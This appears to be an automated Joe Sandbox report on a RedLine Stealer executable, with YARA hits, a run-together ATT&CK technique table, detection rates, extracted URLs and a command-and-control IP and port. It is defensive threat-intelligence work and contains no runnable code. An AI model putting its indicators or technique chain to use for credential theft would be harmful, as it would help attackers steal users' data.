                    Source: Yara matchFile source: 0.2.yGu4YUwMl6.exe.4110170.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.yGu4YUwMl6.exe.40f8350.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: yGu4YUwMl6.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7452, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.yGu4YUwMl6.exe.40f8350.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.yGu4YUwMl6.exe.4110170.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.yGu4YUwMl6.exe.4110170.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.yGu4YUwMl6.exe.40f8350.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: yGu4YUwMl6.exe PID: 7276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7452, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		311
                    Process Injection                    		11
                    Masquerading                    		1
                    OS Credential Dumping                    		221
                    Security Software Discovery                    		Remote Services1
                    Archive Collected Data                    		11
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)241
                    Virtualization/Sandbox Evasion                    		Security Account Manager241
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information                    		LSA Secrets113
                    System Information Discovery                    		SSHKeylogging14
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                    Software Packing                    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    yGu4YUwMl6.exe71%VirustotalBrowse
                    yGu4YUwMl6.exe71%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    yGu4YUwMl6.exe100%AviraHEUR/AGEN.1309734

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://185.222.58.44:50%Avira URL Cloudsafe
                    http://185.222.58.44:55615/0%Avira URL Cloudsafe
                    http://185.222.58.44:556150%Avira URL Cloudsafe
                    185.222.58.44:556150%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ip.sb.cdn.cloudflare.net
                    		104.26.12.31
                    		truefalse
                      		high
                      api.ip.sb
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ip.sb/geoipfalse
                          		high
                          http://185.222.58.44:55615/true
                          • Avira URL Cloud: safe
                          		unknown
                          185.222.58.44:55615true
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabtmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drfalse
                            		high
                            http://www.fontbureau.com/designersGyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://duckduckgo.com/ac/?q=tmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drfalse
                                		high
                                http://www.fontbureau.com/designers/?yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/bTheyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXRegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.fontbureau.com/designers?yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/Endpoint/EnvironmentSettingsRegSvcs.exe, 00000003.00000002.1869525432.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/soap/envelope/RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://185.222.58.44:5RegSvcs.exe, 00000003.00000002.1869525432.0000000002C7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.tiro.comyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://tempuri.org/RegSvcs.exe, 00000003.00000002.1869525432.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drfalse
                                                  		high
                                                  http://www.fontbureau.com/designersyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.goodfont.co.kryGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://tempuri.org/Endpoint/VerifyUpdateResponseRegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://tempuri.org/Endpoint/SetEnvironmentRegSvcs.exe, 00000003.00000002.1869525432.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://tempuri.org/Endpoint/SetEnvironmentResponseRegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.sajatypeworks.comyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://tempuri.org/Endpoint/GetUpdatesRegSvcs.exe, 00000003.00000002.1869525432.0000000002A1E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.typography.netDyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.founder.com.cn/cn/cTheyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.galapagosdesign.com/staff/dennis.htmyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://api.ipify.orgcookies//settinString.RemovegyGu4YUwMl6.exe, 00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://185.222.58.44:55615RegSvcs.exe, 00000003.00000002.1869525432.0000000002A1E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drfalse
                                                                          		high
                                                                          http://www.galapagosdesign.com/DPleaseyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://tempuri.org/Endpoint/VerifyUpdateRegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://tempuri.org/0RegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.fonts.comyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.sandoll.co.kryGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.urwpp.deDPleaseyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.zhongyicts.com.cnyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.sakkal.comyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://ipinfo.io/ip%appdata%yGu4YUwMl6.exe, 00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.apache.org/licenses/LICENSE-2.0yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.fontbureau.comyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drfalse
                                                                                                    		high
                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://tempuri.org/Endpoint/CheckConnectResponseRegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://schemas.datacontract.org/2004/07/RegSvcs.exe, 00000003.00000002.1869525432.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://api.ip.sb/geoip%USERPEnvironmentROFILE%yGu4YUwMl6.exe, 00000000.00000002.1769436422.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, RegSvcs.exe, 00000003.00000002.1867602795.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://api.ip.sbRegSvcs.exe, 00000003.00000002.1869525432.00000000028F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drfalse
                                                                                                                		high
                                                                                                                http://tempuri.org/Endpoint/CheckConnectRegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.ecosia.org/newtab/tmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drfalse
                                                                                                                    		high
                                                                                                                    http://tempuri.org/Endpoint/SetEnvironRegSvcs.exe, 00000003.00000002.1869525432.0000000002C7E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.carterandcone.comlyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://ac.ecosia.org/autocomplete?q=tmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drfalse
                                                                                                                          		high
                                                                                                                          http://www.fontbureau.com/designers/cabarga.htmlNyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.founder.com.cn/cnyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.fontbureau.com/designers/frere-user.htmlyGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://schemas.xmlsoap.org/ws/2004/08/addressingRegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://tempuri.org/Endpoint/GetUpdatesResponseRegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.jiyu-kobo.co.jp/yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://tempuri.org/Endpoint/EnvironmentSettingsResponseRegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.fontbureau.com/designers8yGu4YUwMl6.exe, 00000000.00000002.1771731563.0000000006792000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpBB13.tmp.3.dr, tmp848F.tmp.3.dr, tmp845D.tmp.3.dr, tmp846D.tmp.3.dr, tmp84BF.tmp.3.dr, tmp844C.tmp.3.dr, tmp848E.tmp.3.dr, tmp4D59.tmp.3.dr, tmp4D7B.tmp.3.dr, tmp843B.tmp.3.dr, tmp4D6A.tmp.3.dr, tmp847E.tmp.3.drfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/soap/actor/nextRegSvcs.exe, 00000003.00000002.1869525432.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high

                                                                                                                                              World Map of Contacted IPs

                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs

                                                                                                                                              Public IPs

                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              185.222.58.44
                                                                                                                                              		unknownNetherlands
                                                                                                                                              		51447ROOTLAYERNETNLtrue
                                                                                                                                              104.26.12.31
                                                                                                                                              		api.ip.sb.cdn.cloudflare.netUnited States
                                                                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                                                                              General Information

                                                                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                                                                              Analysis ID:1621303
                                                                                                                                              Start date and time:2025-02-21 19:25:34 +01:00
                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 6m 24s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:full
                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                              Number of analysed new started processes analysed:9
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Sample name:yGu4YUwMl6.exe
                                                                                                                                              renamed because original name is a hash value
                                                                                                                                              Original Sample Name:1161b525009e7448837a658eecc04275.exe
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@6/44@1/2
                                                                                                                                              EGA Information:
                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 98%
                                                                                                                                              • Number of executed functions: 76
                                                                                                                                              • Number of non-executed functions: 16
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                              Warnings

                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 2.19.106.160, 52.149.20.212, 13.107.246.60
                                                                                                                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                              Simulations

                                                                                                                                              Behavior and APIs

                                                                                                                                              TimeTypeDescription
                                                                                                                                              13:26:32API Interceptor1x Sleep call for process: yGu4YUwMl6.exe modified
                                                                                                                                              13:26:42API Interceptor36x Sleep call for process: RegSvcs.exe modified

                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                              IPs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              104.26.12.31VKJITO.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                              • ip.sb/

                                                                                                                                              Domains

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              api.ip.sb.cdn.cloudflare.net824-1824-0x0000000000620000-0x0000000000A98000-memory.dmp.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 172.67.75.172
                                                                                                                                              3612-1418-0x00000000009F0000-0x0000000000E68000-memory.dmp.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 104.26.12.31
                                                                                                                                              Implosions.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 172.67.75.172
                                                                                                                                              3368-1493-0x0000000000AB0000-0x0000000000F28000-memory.dmp.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 104.26.13.31
                                                                                                                                              Implosions.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 104.26.12.31
                                                                                                                                              TxTPu961er.exeGet hashmaliciousAmadey, RedLine, StealcBrowse
                                                                                                                                              • 172.67.75.172
                                                                                                                                              NWzeEUBQ7F.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 172.67.75.172
                                                                                                                                              A18OkaGxHz.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 104.26.12.31
                                                                                                                                              Uv4EriqDCj.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 104.26.12.31
                                                                                                                                              nePPsHIZ1m.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 104.26.13.31

                                                                                                                                              ASNs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              CLOUDFLARENETUSReliablecontrols_Pduncan.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                              • 172.64.41.3
                                                                                                                                              http://globalbpnproject.netGet hashmaliciousUnknownBrowse
                                                                                                                                              • 188.114.96.3
                                                                                                                                              https://rvrteam.com/Get hashmaliciousUnknownBrowse
                                                                                                                                              • 172.67.142.245
                                                                                                                                              https://forms.microsoft.com/e/fhhfp2jwjXGet hashmaliciousHTMLPhisher, Invisible JSBrowse
                                                                                                                                              • 104.17.25.14
                                                                                                                                              https://www.dropbox.com/scl/fi/ewypv44bwb67h97z8mo2b/You-have-receievd-a-new-document.paper?rlkey=2q43w5jslqmoczf75abn7siaq&dl=0Get hashmaliciousUnknownBrowse
                                                                                                                                              • 104.16.99.29
                                                                                                                                              http://node-red.orgGet hashmaliciousUnknownBrowse
                                                                                                                                              • 104.21.96.1
                                                                                                                                              FW Microsoft subscription purchase confirmation.msgGet hashmaliciousUnknownBrowse
                                                                                                                                              • 1.1.1.1
                                                                                                                                              https://56a1a721.8ce395d20e6a84048459b0f5.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                              • 172.67.173.86
                                                                                                                                              https://56a1a721.8ce395d20e6a84048459b0f5.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                              • 172.67.173.86
                                                                                                                                              https://mhxfer.filetransfers.net/files/download/41422037Get hashmaliciousUnknownBrowse
                                                                                                                                              • 1.1.1.1
                                                                                                                                              ROOTLAYERNETNLNWzeEUBQ7F.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 45.137.22.234
                                                                                                                                              A18OkaGxHz.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 45.137.22.234
                                                                                                                                              Uv4EriqDCj.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 185.222.58.36
                                                                                                                                              nePPsHIZ1m.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 45.137.22.165
                                                                                                                                              3WSFIhTu1M.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 185.222.58.254
                                                                                                                                              qJ64p5G1XJ.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 45.137.22.227
                                                                                                                                              chTJmCR9bS.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                              • 185.222.57.84
                                                                                                                                              RFQ.exeGet hashmaliciousQuasar, PureLog StealerBrowse
                                                                                                                                              • 185.222.57.67
                                                                                                                                              p0GiAimtNm.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 185.222.58.237
                                                                                                                                              nzLoHpgAln.exeGet hashmaliciousRedLineBrowse
                                                                                                                                              • 185.222.57.76

                                                                                                                                              JA3 Fingerprints

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adCHEMICAL LIST.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                              • 104.26.12.31
                                                                                                                                              AWB_3570456515#U00b7PDF.scr.exeGet hashmaliciousMSIL LoggerBrowse
                                                                                                                                              • 104.26.12.31
                                                                                                                                              Swift Copy_19.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                              • 104.26.12.31
                                                                                                                                              Swift Copy_19.02.2025.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                              • 104.26.12.31
                                                                                                                                              [ID] Statement of Accounts-XXXXX4250-200220252003060444.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                              • 104.26.12.31
                                                                                                                                              INV76280.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                                                                                                                              • 104.26.12.31
                                                                                                                                              rAntephialtic.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                              • 104.26.12.31
                                                                                                                                              Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                              • 104.26.12.31
                                                                                                                                              rfacturapendiente.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                              • 104.26.12.31
                                                                                                                                              invoice for payment request.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                              • 104.26.12.31

                                                                                                                                              Dropped Files

                                                                                                                                              No context

                                                                                                                                              Created / dropped Files

                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):2666
